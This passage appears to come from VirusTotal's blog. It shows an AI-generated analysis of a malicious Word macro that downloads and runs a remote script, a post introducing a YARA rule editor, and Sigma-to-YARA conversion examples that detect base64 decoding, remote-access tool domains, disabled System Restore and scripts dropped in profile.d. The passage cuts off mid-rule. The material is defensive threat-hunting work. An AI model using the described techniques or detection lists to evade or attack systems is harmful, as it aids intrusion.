<p>To illustrate the practical application of these search parameters, let's walk through a scenario an analyst might encounter. Suppose you have received an alert from your SIEM pointing to the IP address 192.168.45.239. You want to find out if there is any document associated with this particular IP.</p>
<p>The search query <a href="https://www.virustotal.com/gui/search/crowdsourced_ai_analysis%253A192.168.45.239/files" style="text-decoration: none;">"crowdsourced_ai_analysis:192.168.45.239"</a> yields a .DOC file linked with the IP address.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="516" data-original-width="1346" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjw2ph2Z1Eh51uuqK4VJuft_a7iz62EWMPiWXK2rNpUfHm2oo77doTPqGSvdjNHxnVDhtiAwMN5d97Ncu6aafdfY1atSll8WuUDYBVV9wbBfNodkEL15tOqb26lUfccclLEdXlpjHQGgZlF_1DvAVb0DSi-fC4-E-Xnhz6AeYAC3yoRQiuiY6AJ1XvXloM/s1600/crowdsourced_ai_3.png"/></div></center><br>
<p>Clicking on the search-returned sample, we can read the AI description and find that the macro within the .DOC file uses the CreateProcess function to run an obfuscated PowerShell command. Decoding the base64 string reveals that this command downloads and executes a script from 'hxxp://192.168.45.239/run.txt'.</p>
<center><div class="separator" style="clear: both;"><img alt="" border="0" data-original-height="1360" data-original-width="1498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvckfQw_M3DiP_5V4JTysDOoK1dVZYU7F19cqjOk5pQb4_7i0WcFB7KyX7qvsLKXNQZiQdIWu5uwlAHpyFdSAHkoCEPgDEtRVcBNc6wPT-WEMF4aOzM0mdEK2gMAXqfzY4H8HpHxGJLhiAmfAKKx3cbyHYFeeIJ2ASBq0NLFiVbCdG_BaSP1pHGacDn1E/s1600/crowdsourced_ai_4.png"/></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><a href="https://www.virustotal.com/gui/file/5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-size: xx-small;">5a1cad5a9e9be128aa4436540450b17b6716cb64711894078435266106870e6a</span></span></a></p></center>
<b>Join Crowdsourced AI</b><br>
<p>At VirusTotal, our commitment to facilitating collaboration within the security community is unwavering. This extends beyond merely integrating AI models and use cases into our platform. We're also more than willing to supply datasets, comprising samples and metadata, to assist in training innovative security solutions.</p>
<p>If you're utilizing an AI model or have identified a potential use case that can enhance our collective security posture, we eagerly invite your contribution. Our goal isn't confined to file and code analysis models; we are open to any use case applicable within the VirusTotal ecosystem. This includes, but is not limited to, solutions addressing static and dynamic analysis explanation, metadata extraction, summarization and evaluation, applications related to domain names, URLs, IP addresses, and tackling various forms of cyber threats such as phishing and other sophisticated attacks.</p>
<p>By broadening our scope and welcoming diverse solutions, we aim to transform VirusTotal into a central hub for superior AI models and use cases across all aspects of the security domain. In doing so, we strengthen our community's defenses and augment our capacity to counter a wide spectrum of cyber threats.</p>
<p>Thank you for being a part of the security community and supporting collective efforts to improve threat detection and response.</p>
Bernardo.Quinterohttp://www.blogger.com/profile/17288490159411812678noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-71482716007388939822023-07-13T11:09:00.003+02:002023-08-04T12:13:54.877+02:00Actionable Threat Intel (III) - Introducing the definitive YARA editor
<div class="interval_12">
One of VirusTotal's biggest strengths is its Hunting capabilities using YARA rules. In addition to matching all files against a big set of crowdsourced YARA rules, it also allows users to create their own detection and classification rules.
</div>
<div class="interval_12">
YARA was originally intended to support file-based rules. VirusTotal's <b><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" target="_blank">"vt" module</a></b> extended YARA's capabilities with file metadata and behavior. This allows our users to create advanced <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> and <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b> rules and get notified via <b><a href="https://www.virustotal.com/gui/ioc-notifications/all?order=date-" target="_blank">IoC Stream</a></b> every time <u>new</u> or <u>re-scanned</u> files match our rules.
</div>
<div class="interval_12">
Designing good YARA rules requires some level of expertise and time investment. That’s why we have reengineered our built-in YARA editor to make it easier for our users to create, test and deploy rules. In this post we will provide details for all its new capabilities!
</div>
<div class="interval_12">
Other than making YARAs look glorious with <b>full syntax coloring</b> and <b>auto-complete</b>, there is much more this editor offers. But first let’s clarify how to find the new editor.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/ger3Gvf9IpcIUML3AOgQRtG5gxqg_hKyfOvdacbGGjHd03jGgjTINpFdOTmgO35EuqDPihCNmkVucr6UsvgwQrR648WqdqCZOMo1h-S8xH91pg_-h_9WTonhI8ZGIYSiAM1-PUsvzP_goQdotVRa1W64268oA2TXduHBmnH0teU_dmMkP4_Z0fA8QAU7C8ujar8rLTQs3V3MVAPGqZLZ7mmHBVGh5nyFl-ZdKg" />
</div>
<div class="interval_12">
The new YARA editor can be accessed from the <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> or <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b> dashboards, reachable via the <b>Hunting</b> dropdown in the top-left menu of the landing page. From the Livehunt dashboard, the <b>“New Livehunt Ruleset”</b> dropdown has 4 options that link you to the YARA editor for the specific entity of your interest.
</div>
<div class="interval_12">
This post will focus on <b>file rules</b> - but stay tuned for future posts detailing all other options.
</div>
<div class="central_img width_40 interval_12">
<img src="https://lh4.googleusercontent.com/1Ey5hGwzeHAaNIubXY7bf6cwQY2oHk44Tup8UcQ5tgGdua_mCWRGak_pkKYUa6zSXUOrH28pO2-8nkuwVHljtD-aje3ivVDMAKuCpbI-MLd1HyR58cCc_qNjmU5SbuPJvxOu9VuK7r5GrKQHFwFu85A6Hfp5fJQWeQo5fsNh2fj1L3n8H-LY94AnYKViBD9mB8oFtUla-FwzNtdj0N3sK-xevrj6J25JdsVn0A" />
</div>
<div class="interval_12">
Ok, now let’s see in more detail all the big new features!
</div>
<br/>
<h2 style="text-align: left;">Feature #1 - YARA rule templates</h2>
<div class="interval_12">
The YARA editor provides you with pre-defined self-descriptive <b>rule templates</b> (<a href="https://developers.virustotal.com/docs/nethunt-examples" target="_blank">here</a> you can find full details). We will keep adding more templates in the future and refreshing existing ones.
</div>
<div class="interval_12">
For instance, let’s say that you are interested in new samples, detected as malicious by AntiVirus engines, and hosted on a certain domain or URL. You can filter the available templates using keywords such as “URL”, “download” and “positive”, and select the one that fits best based on its description, as shown in the image below.
</div>
<div class="central_img width_80 interval_12">
<img src="https://lh4.googleusercontent.com/fD67sYM2TRjrODssU1CpwX7am72C7du-cP3vgmiLZJ4BWOkwMmKRTHi2-I77cNLCSA8ryggnz-rfuzCJO2uLgfGUezC6ycxMLCES_zZDWbmAdKD48hsGCy2XInWglGhUXS-9gp_aHNv_eEsReF-Wu05KBrBen9lHGlPc0H2cE1sM0PuLaOV_sQtmR_Ti-p9KxRxj9euoCRh_hjdUyjYDl0R7bQ6cSFFzur6cQw" />
</div>
<div class="interval_12">
Now it’s easier to build your own rules by making use of the suggested templates. You just need to replace the placeholders with your specifics; in this case, the target URL and the number of detections for new files. Additionally, it is very important to rename the predefined rules so you can easily identify the source of the notifications you'll receive in your <a href="https://blog.virustotal.com/2023/06/actionable-threat-intel-ii-ioc-stream.html" target="_blank"><b>IoC Stream</b></a>.
</div>
<div class="interval_12">
We will create a new rule based on these templates, with a few extra details: [1] we want to get PDF files only, [2] check if the file was seen hosted in a given domain, and [3] add a couple of extra domains to check if the file resolved them when executed in any of our sandboxes. Here is the resulting rule:
</div>
<div class="my-code interval_12">
<mark class="orange">import</mark> <mark class="green">"vt"</mark> <br/><br/>
rule malware_hosted_on_strikinglycdn {<br/><br/>
meta:<br/>
description = <mark class="green">"Detects malicious files hosted on strikinglycdn.com domain."</mark><br/>
category = <mark class="green">"MAL"</mark><br/>
examples = <mark class="green">"https://www.virustotal.com/gui/search/p%253A5%252B%2520itw%253Astrikinglycdn.com%2520(behaviour_network%253A%2522oyndr.com%2522%2520or%2520behaviour_network%253A%2522fancli.com%2522)/files"</mark><br/>
creation_date = <mark class="green">"2023-07-11"</mark><br/>
last_modified = <mark class="green">"2023-07-11"</mark><br/><br/>
condition:<br/>
<mark class="gray">// combining existing templates</mark><br/>
vt.<mark class="blue">metadata.analysis_stats.malicious</mark> > <mark class="red">5</mark> and<br/>
vt.<mark class="blue">metadata.new_file</mark> and<br/>
<mark class="gray">// [1] checking filetype</mark><br/>
vt.<mark class="blue">metadata.file_type</mark> == vt.<mark class="blue">FileType.PDF</mark> and<br/>
<mark class="gray">// [2] check if the file was hosted in this domain</mark><br/>
(<br/>
vt.<mark class="blue">metadata.itw.domain.raw</mark> iendswith <mark class="green">".strikinglycdn.com"</mark> or<br/>
vt.<mark class="blue">metadata.itw.domain.raw</mark> == <mark class="green">"strikinglycdn.com"</mark><br/>
) and<br/>
<mark class="gray">// [3] check if it resolves these domains during sandbox detonation</mark><br/>
<mark class="orange">for</mark> any dns_lookup <mark class="orange">in</mark> vt.<mark class="blue">behaviour.dns_lookups</mark> : (<br/>
dns_lookup.<mark class="blue">hostname</mark> == <mark class="green">"oyndr.com"</mark> or<br/>
dns_lookup.<mark class="blue">hostname</mark> == <mark class="green">"fancli.com"</mark> <br/>
) <br/>
}
</div>
<br/>
<h2 style="text-align: left;">Feature #2 - YARA playground</h2>
<div class="interval_12">
When designing a rule it is always very hard to find the right balance between over- and under-fitting. Is our rule detecting the samples it is based on? How many other samples are being detected by it? Does our rule detect any unintended legitimate samples? Given this is the first thing every security expert would do, we decided to make it easier to test your fresh new rule against a set of IoCs.
</div>
<div class="interval_12">
At the bottom of the editor you will find 3 tabs. In the <b>TEST</b> tab you can add the set of IoCs you want to test your rule against, as shown below.
</div>
<div class="central_img width_50 interval_12">
<img src="https://lh6.googleusercontent.com/KNmta2CoGOsJS6FBw-SxDy6Ld0mfqnh4yW3tJGcrScwtlXQvRiUAoTkLjZx0BHg2vOq1H8eUqymLbiL7drJ1kbJSWszUteeC1jSnNGQyQ4FDJ1ozGOkyjbqFwXLNgd5wyVjXYhw6qEFAvXEG0USSiJfHaEO_RMZa8-riYPpiNpQvo0mhaYx9P2_0th-Gk_6XKp-QNYpnx4WBE0npiI65pgJJwIAr4gL6Rf2W2g" />
</div>
<div class="interval_12">
Then we are ready to <b>Run test</b> and find <b>TEST RESULTS</b> in the next tab, showing how the tested IoCs matched our rule.
</div>
<div class="central_img width_50 interval_12">
<img src="https://lh6.googleusercontent.com/JrVc--Bg_iR1cvA7QI7Bx4EWhR9li3vbtVbx4rJAyrJjP2oXvJBhxNn_gxa1vgF6sl-fEfxELx-sQc4q5NUmZqGaywxSnD6ahR1mvt9QZUehXNt6VYyigQyzqpBZ2b2UV42oSHnsKRFsdrJrh80pmNqGJuHMmMDyql-AN1edDDy7t1xG-UhqaG38KwH9uO2V0eFs5yV5gR8PmgJ0x3m3E8LD4f1FGYyy70QVdw" />
</div>
<div class="interval_12">
If anything goes wrong, the <b>PROBLEMS</b> tab will give you details.
</div>
<div class="interval_12">
Additionally, when working with multiple rulesets in multiple web browser tabs at the same time, the <b>YARA editor</b> displays a
<img class="width_15" src="https://lh4.googleusercontent.com/PSHd6xLCdxIrBgttzGw9S0tIHMetBC5v0TIzpgstJ67m4duZICY1Amxoabcn_gIjijmRIZY65ER3nwFbNJIzT4nBvlgULK1JiRO5LW4EebpdvI8C74YLLLXbq3BtbZ8Mg2e-jlVqFPwhZIHlyougrtL8nB7WH7K1rXlv066zoBeep3WJqFLfgh-01KWqB-Bd8-sVxlqkghJTeLwce7H7L-_LTF1LC1mUeumpCw" />
message in the top right corner so that the entity you are targeting with your rules always stays in the spotlight.
</div>
<br/>
<h2 style="text-align: left;">Wrapping up</h2>
<div class="interval_12">
The new YARA editor is integrated with both <b><a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank">Livehunt</a></b> and <b><a href="https://www.virustotal.com/gui/hunting/retrohunt" target="_blank">Retrohunt</a></b>, so it will basically be our default editor for anything YARA-related in VirusTotal. The goal is to make writing rules easier and faster, and to put everything you need, from templates to testing, in one place.
</div>
<div class="interval_12">
You may have noticed that the ITW feature is not included in the <b><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" target="_blank">official documentation</a></b>, and that it was not previously possible to perform this type of check. This is because it is part of our ongoing improvements to the "vt" module for YARA, which we will be introducing to you very soon.
</div>
<div class="interval_12">
We hope you find all these new features as useful as we do. If you have any questions or requests please do not hesitate to <a href="https://www.virustotal.com/gui/contact-us/other" target="_blank">contact us</a>.
</div>
<div class="interval_12">
Don’t forget to stay tuned, <b>Netloc Hunting</b> is coming! And as always, happy hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Alexandra Martinhttp://www.blogger.com/profile/08447900589635774086noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-44350428338132885222023-06-26T14:34:00.004+02:002023-06-26T15:54:41.230+02:00Threat hunting converting SIGMA to YARA<p>
<span style="font-family: Arial;">
<span style="font-size: 14.6667px; white-space-collapse: preserve;">Malware threat hunting is the process of proactively searching for malicious activity. It is a critical part of any organization's security posture, as it can help to identify and mitigate threats that may have otherwise gone undetected.</span>
</span>
</p>
<p>
<span style="font-family: Arial; font-size: 11pt; white-space-collapse: preserve;">Sigma rules and YARA rules are two powerful tools that can be used for detection and malware threat hunting. Sigma rules are a type of open rule language that</span>
<span style="font-family: Arial; font-size: 11pt; white-space-collapse: preserve;"> can be used to describe malicious activity. </span>
</p>
<span id="docs-internal-guid-561ba94e-7fff-67e2-f050-010893bccfd3">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Many sigma rules can be converted into yara rules for use with the </span><a href="https://support.virustotal.com/hc/en-us/articles/360007088057-Writing-YARA-rules-for-Livehunt" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">VT yara module</span>
</a><span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">to match data from our</span> <a href="https://support.virustotal.com/hc/en-us/articles/6253253596957-In-house-Sandboxes-behavioural-analysis-products" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">inhouse</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> and </span><a href="https://support.virustotal.com/hc/en-us/articles/7904672302877-External-behavioural-engines-sandboxes" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">external</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> sandboxes and behavioral engines. You can then use the VirusTotal</span>
<a href="https://support.virustotal.com/hc/en-us/articles/9175806754461-IOC-Stream-Threat-Feeds" style="text-decoration-line: none;">
<span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;"> IOC Stream</span>
</a>
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;"> to view the YARA matches on new file analyses. </span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 12pt; margin-top: 12pt;">
<span style="font-family: Arial; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Below are some examples of how to convert from <a href="https://github.com/SigmaHQ/sigma" target="_blank">SIGMA</a> to <a href="https://yara.readthedocs.io/" target="_blank">YARA</a>:</span>
</p>
<br />
<h2 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="font-family: Arial; font-size: 16pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline; white-space-collapse: preserve;">Example 1: Matching processes</span>
</h2>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 10pt; margin-top: 0pt;">
<span face="'Google Sans Text', sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space-collapse: preserve;">Consider the Sigma rule to <a href="https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" target="_blank">detect base64 decoding</a>. </span></p>
<pre>title: Decode Base64 Encoded Text -MacOs
id: 719c22d7-c11a-4f2c-93a6-2cfdd5412f68
status: test
description: Detects usage of base64 utility to decode arbitrary base64-encoded text
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md
author: Daniil Yugoslavskiy, oscd.community
date: 2020/10/19
modified: 2022/11/26
tags:
- attack.defense_evasion
- attack.t1027
logsource:
category: process_creation
product: macos
detection:
selection:
Image: '/usr/bin/base64'
CommandLine|contains: '-d'
condition: selection
falsepositives:
- Legitimate activities
level: low
</pre>
<br />
<p>The Sigma rule can be translated to a YARA rule similar to:</p>
<pre>import "vt"
rule base64decode
{
meta:
sigma_source = "https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml"
example1 = "f3e5c20b34731d6611e1a49def1c89d5c180db9bb465f8471ba84c1ad16b90e5"
example2 = "ea502018cb3eeb56a930df29c7447857c6cca05d3431d2f575d2c62753bb81f1"
condition:
for any cmd in vt.behaviour.command_executions : (
cmd icontains "base64 " and cmd icontains " -d"
)
}
</pre>
<br />
<p>Remember to test your rule to ensure it matches the desired samples.</p>
<p>
<img src="https://lh5.googleusercontent.com/UZpBRN_VVoMPiLCIsODGQHif9UvaMzII4VG4873H6NhA-5sWb4RaMFx_zN6B3epGPKSNYLqQ7JLF3HQ0LyWWwDxnwZM4wthPo4A3Bt3bsmYBawSiBHEqKvITNm0kHrY0jHm93MX--Wwvq-T0v8JQduWuijYeETZLTW6TxGg-9dQOqXFR6-Kwz2jxb_fp2OQB9TZyvLyWXnoUcpfJh7cRCdKNVWqe9cJMGioA_Q" style="margin-left: 0px; margin-top: 0px;" width="624" />
</p>
<br />
<h2>Example 2: Matching DNS</h2>
<p>
In this example, we will write a YARA rule that produces results similar to the
<a href="https://www.virustotal.com/gui/intelligence-overview">VirusTotal Intelligence</a> query built with the <a href="https://support.virustotal.com/hc/en-us/articles/360001385897-File-search-modifiers">search modifier</a>:
</p>
<ul>
<li><a href="https://www.virustotal.com/gui/search/sigma_rule%253A%2522DNS%2520Query%2520To%2520Remote%2520Access%2520Software%2522/files" > sigma_rule:"DNS Query To Remote Access Software"</a>.
</li>
</ul>
<p>Sigma rule from <a href="https://github.com/SigmaHQ/sigma/blob/cda0fbff62ce7f818198701452f1e0820f257b62/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml#L4">SigmaHQ to detect common remote access domains</a>:
</p>
<pre>title: DNS Query To Remote Access Software Domain
id: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52
related:
- id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f
type: obsoletes
- id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d
type: obsoletes
- id: ed785237-70fa-46f3-83b6-d264d1dc6eb4
type: obsoletes
status: experimental
description: |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution
- https://redcanary.com/blog/misbehaving-rats/
author: frack113, Connor Martin
date: 2022/07/11
modified: 2023/04/18
tags:
- attack.command_and_control
- attack.t1219
logsource:
product: windows
category: dns_query
detection:
selection:
QueryName|endswith:
- '.getgo.com'
- '.logmein.com'
- '.ammyy.com'
- '.netsupportsoftware.com' # For NetSupport Manager RAT
- 'remoteutilities.com' # Usage of Remote Utilities RAT
- '.net.anydesk.com'
- 'api.playanext.com'
- '.relay.splashtop.com'
- '.api.splashtop.com'
- 'app.atera.com'
- '.agentreporting.atera.com'
- '.pubsub.atera.com'
- 'logmeincdn.http.internapcdn.net'
- 'logmein-gateway.com'
- 'client.teamviewer.com'
</pre>
The above Sigma signature can be expressed as a YARA rule:
<pre>import "vt"
rule dns_remote_access
{
meta:
sigma_src = "https://github.com/SigmaHQ/sigma/blob/c05f864047ffbe793299499c79ec52920062159f/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml#L4"
condition:
for any lookup in vt.behaviour.dns_lookups : (
for any host in (".getgo.com",".logmein.com",".ammyy.com",".netsupportsoftware.com","remoteutilities.com","net.anydesk.com","relay.splashtop.com","api.splashtop.com","app.atera.com","agentreporting.atera.com","pubsub.atera.com","http.internapcdn.net","logmein-gateway.com","client.teamviewer.com") : (
lookup.hostname contains host
))
}
</pre>
<h2> Example 3: Matching registry keys set</h2>
In this example we will match on registry keys that a sample sets. Using VT Intelligence you can search for strings within registry keys or values with a query like:
<a href="https://www.virustotal.com/gui/search/behaviour_registry%253ASystemRestore%255CDisableConfig/files">behaviour_registry:SystemRestore\DisableConfig</a>
<br />
Consider the sigma rule:
<pre>title: Registry Disable System Restore
id: 5de03871-5d46-4539-a82d-3aa992a69a83
status: experimental
description: Detects the modification of the registry to disable a system restore on the computer
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry
author: frack113
date: 2022/04/04
modified: 2022/09/09
tags:
    - attack.impact
    - attack.t1490
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        EventType: Setvalue
        TargetObject|contains:
            - '\Policies\Microsoft\Windows NT\SystemRestore'
            - '\Microsoft\Windows NT\CurrentVersion\SystemRestore'
        TargetObject|endswith:
            - DisableConfig
            - DisableSR
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unknown
level: high
</pre>
<br />
<p>The sigma rule as yara:</p>
<pre>import "vt"

rule disable_restore
{
    meta:
        sigma_source = "https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml#L2"
        example1 = "08c2d3fec8cd9fcced634df7ad0f3db164ffe0cbfc263e2d8be026afca05bfcb"
    condition:
        for any reg in vt.behaviour.registry_keys_set : (
            ( reg.key contains "\\Policies\\Microsoft\\Windows NT\\SystemRestore"
              or reg.key contains "\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore" )
            and ( reg.key contains "DisableSR" or reg.key contains "DisableConfig" )
            and ( reg.value contains "1" )
        )
}
</pre>
<br />
<p>Test your rule to ensure it matches desired samples:</p>
<p>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkDdq_JyIK_s0MMrZoT-e44CbMlJCxhuH5f9uSzmryjRei147hF1ltETcKM7F-iu49nNEaO61V6xjxD1V-6_5tTRPihNYNs8CZH8YFTJwzoXuy7cPYtYDT3LQR7yTJRmrZ32lG0-71bWuP19dcA5vqh0YMXQ9345Ph2zln9O0sW30q9omXJoSBDvHGj0/s1111/reg_disable_restore.png" style="margin-left: 1em; margin-right: 1em;">
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkDdq_JyIK_s0MMrZoT-e44CbMlJCxhuH5f9uSzmryjRei147hF1ltETcKM7F-iu49nNEaO61V6xjxD1V-6_5tTRPihNYNs8CZH8YFTJwzoXuy7cPYtYDT3LQR7yTJRmrZ32lG0-71bWuP19dcA5vqh0YMXQ9345Ph2zln9O0sW30q9omXJoSBDvHGj0/s1111/reg_disable_restore.png" width="100%" /></a>
</p>
<br />
<h2>Example 4: Matching files on disk</h2>
<p>A Sigma rule from SigmaHQ to detect <a href="https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml">Linux samples modifying /etc/profile.d</a>:</p>
<pre>title: Potentially Suspicious Shell Script Creation in Profile Folder
id: 13f08f54-e705-4498-91fd-cce9d9cee9f1
status: experimental
description: Detects the creation of shell scripts under the "profile.d" path.
references:
    - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
    - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
    - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
    - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023/06/02
tags:
    - attack.persistence
logsource:
    product: linux
    category: file_event
detection:
    selection:
        TargetFilename|contains: '/etc/profile.d/'
        TargetFilename|endswith:
            - '.csh'
            - '.sh'
    condition: selection
falsepositives:
    - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
    - Regular file creation during system update or software installation by the package manager
level: low # Can be increased to a higher level after some tuning
</pre>
<p>
This could be searched with a VT Intelligence query like:
<a href="https://www.virustotal.com/gui/search/behaviour_files%253A%2522%252Fetc%252Fprofile.d%252F%2522%2520and%2520(behaviour_files%253A%2522.sh%2522%2520or%2520behaviour_files%253A*.csh)%2520and%2520(tag%253Aelf%2520or%2520tag%253Ashell)/files" style="text-decoration-line: none;">
behaviour_files:"/etc/profile.d/" and (behaviour_files:".sh" or behaviour_files:*.csh) and (tag:elf or tag:shell)
</a>
</p>
<p>As yara:</p>
<pre>import "vt"

rule suspicious_profile_folder
{
    meta:
        sigma_source = "https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml"
        example_hash1 = "e15e93db3ce3a8a22adb4b18e0e37b93f39c495e4a97008f9b1a9a42e1fac2b0"
        example_hash2 = "447431333b2c2a72ac213a9fa2da8c2b09383ae75c3b31a88acfa79b8d43b8d8"
        author = "Joseliyo Sanchez, @Joseliyo_Jstnk"
    condition:
        // files_dropped entries are objects with a .path attribute
        for any dropped in vt.behaviour.files_dropped : (
            dropped.path contains "/etc/profile.d/"
            and ( dropped.path endswith ".sh" or dropped.path endswith ".csh" )
        )
        or
        // files_written is a plain array of path strings
